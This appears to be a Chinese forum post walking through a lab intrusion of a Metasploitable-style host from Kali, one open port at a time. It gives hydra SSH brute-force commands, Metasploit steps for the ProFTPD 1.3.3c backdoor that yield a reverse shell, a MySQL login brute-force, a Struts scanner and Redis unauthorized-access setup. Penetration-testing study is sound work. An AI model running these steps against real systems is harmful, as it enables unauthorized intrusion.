fudyou 发表于 2022-7-2 11:13:00

常见的端口漏洞入侵主机

                涉及知识点端口漏洞利用当我们渗透一个网站时发现从网站渗透不进去的时候,就可以查看该网站主机开启了哪些端口,来从其开启的端口来进行入侵一旦端口开放的话就可以从外部访问,操作系统都有或多或少的漏洞,特殊的请求或者指令触发之后就可以提升权限实验环境同一网段的两台主机:入侵主机:kali目标主机ip:192.168.31.69使用kali和它本身自带的一些工具对受害主机进行入侵先利用nmap对受害主机进行扫描查看其开启了哪些端口和服务http://img403.hackdig.com/imgpxy.php?url=gnp.7aef9e5790a4-e95b-a704-7a60-9632d16b%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth访问该ip发现80端口是一个phpinfo页面,无法利用80端口入侵http://img403.hackdig.com/imgpxy.php?url=gnp.d44e5c37e7f4-3f89-3184-8038-bcb95aea%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth所以我们开始尝试从其他端口入侵该主机22端口漏洞利用发现其开启了22端口,22端口是SSH远程登录协议。最有可能利用的是弱口令的入侵。使用kali自带hydra来进行暴力破解22端口暴力破解ssh命令:hydra -L /root/桌面/username.txt -P /root/桌面/password.txt -vV -o ssh.log -e ns -f 192.168.31.69 ssh
参数详解:
-L //暴力破解用户名字典-P //暴力破解密码字典-o ssh.log //输出到这个文件里-vV //显示过程-f //搜到账号密码就停止http://img403.hackdig.com/imgpxy.php?url=gnp.16285a86d6e1-b4eb-3844-4baa-46ff9b94%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth经过一段时间的等待发现功夫不负有心人,还真破解出了22端口的登录账号密码http://img403.hackdig.com/imgpxy.php?url=gnp.11222e56a7b5-69c9-0654-562c-c02c7a54%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth然后我们就可以使用破解出来的账号密码成功利用22端口远程登录主机并且发现是root权限http://img403.hackdig.com/imgpxy.php?url=gnp.cb19856c1d0c-d9d8-da34-2eb4-4480163a%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth21端口漏洞利用通过nmap扫描知道21端口开启的ftp版本是ProFTPD 1.3.3c,百度发现ProFTPD 1.3.3c有个后门命令执行漏洞http://img403.hackdig.com/imgpxy.php?url=gnp.1db218ac4a6b-2cca-ef14-b225-1165a1bc%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth启动msfconsolehttp://img403.hackdig.com/imgpxy.php?url=gnp.fe71b7e64873-4b8a-8f54-6561-7908db9b%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth搜索ProFTPD 1.3.3c查看其漏洞模块search ProFTPD 1.3.3c
http://img403.hackdig.com/imgpxy.php?url=gnp.a057b9d305d0-3b59-7d84-f28a-21b9069b%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth
切换到该漏洞模块下,并设置好目标ipuse exploit/unix/ftp/proftpd_133c_backdoor
set RHOSTS 192.168.31.69
run
http://img403.hackdig.com/imgpxy.php?url=gnp.f47b740915bc-8b0b-6f74-88ee-ed4f7faf%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth
成功反弹shell会话http://img403.hackdig.com/imgpxy.php?url=gnp.cd004a4ba51e-913a-6e54-829f-372cdcae%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth3306端口漏洞利用发现该主机还开启了3306端口,那么我们如何利用3306端口入侵目标主机呢?3306端口是MySQL的默认端口,入侵者可以通过入侵3306端口来入侵我们的主机,在Metasploitable系统中,Mysql的身份认证存在漏洞,这个漏洞可以让攻击者不必提供正确的身份证书便可访问Mysql数据库启动msfconsolehttp://img403.hackdig.com/imgpxy.php?url=gnp.02137f24f4c2-2f0a-e014-2ecb-a478c141%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth扫描mysql模块msf5 > search mysqlhttp://img403.hackdig.com/imgpxy.php?url=gnp.2ea27bac742d-26ba-91d4-b606-77f3283c%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth选择MySQL可用模块,在模块中选择渗透工具模块进行攻击这里我们切换到mysql扫描模块,设置模块有效选项msf5 > use auxiliary/scanner/mysql/mysql_login
msf5 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.31.69 #设置目标ip
txt5 auxiliary(scanner/mysql/mysql_login) > set USER_FILE /root/桌面/username.txt #设置用户名字典
txt5 auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/桌面/password.txt #设置密码字典
msf5 auxiliary(scanner/mysql/mysql_login) > set STOP_ON_SUCCESS true #破解成功时停止
msf5 auxiliary(scanner/mysql/mysql_login) >run #开始爆破
成功爆破出MySQL用户名密码
http://img403.hackdig.com/imgpxy.php?url=gnp.8854c0830f73-8178-5034-d987-bd5d6b56%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth利用爆破出的账号密码成功登录MySQL数据库http://img403.hackdig.com/imgpxy.php?url=gnp.f286fb86efad-763b-ae34-5ead-fc485d1b%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth8080端口入侵发现8080端口有一个网站Struts,百度发现Struts可以使用Struts Scan工具获得指定漏洞交互式shell下载Struts Scan解压,并切换到struts-scan-master目录下执行root@kali:~/桌面/struts-scan-master# python struts-scan.py出现如下界面则安装成功http://img403.hackdig.com/imgpxy.php?url=gnp.3f48fe3a06bb-6548-21e4-a386-3c8e1aee%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth使用给出的指定漏洞交互shell执行payload成功获得交互式shell6379端口漏洞入侵该主机还开启了6379端口,发现6379端口可以利用Redis未授权访问漏洞来入侵在本地下载Redis并解压安装wget http://download.redis.io/releases/redis-4.0.8.tar.gz
tar xzf redis-4.0.8.tar.gz
cd redis-3.2.0
make
http://img403.hackdig.com/imgpxy.php?url=gnp.615ae30f9d3a-a18b-9bc4-8ccf-937d201f%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth
修改配置文件,使可以远程访问在bind 127.0.0.1前面加上#将其注释掉把protected-mode后面的yes设为nohttp://img403.hackdig.com/imgpxy.php?url=gnp.6733bb6c4ca5-853b-5894-2acd-57fac514%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth启动redis-server./src/redis-server redis.conf   
如果报错执行下列命令cd /root/redis-4.0.8/src

http://img403.hackdig.com/imgpxy.php?url=gnp.5625210d3d2e-7229-29e4-ae24-ee82b472%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth
然后连接redis发现成功连接http://img403.hackdig.com/imgpxy.php?url=gnp.0a290ccaa577-e9f9-26a4-90f2-ed91a5f1%2F10%2F2202%2Flxx%2Fnc.gsn.gmi%2F%2F%3Asptth
页: [1]
查看完整版本: 常见的端口漏洞入侵主机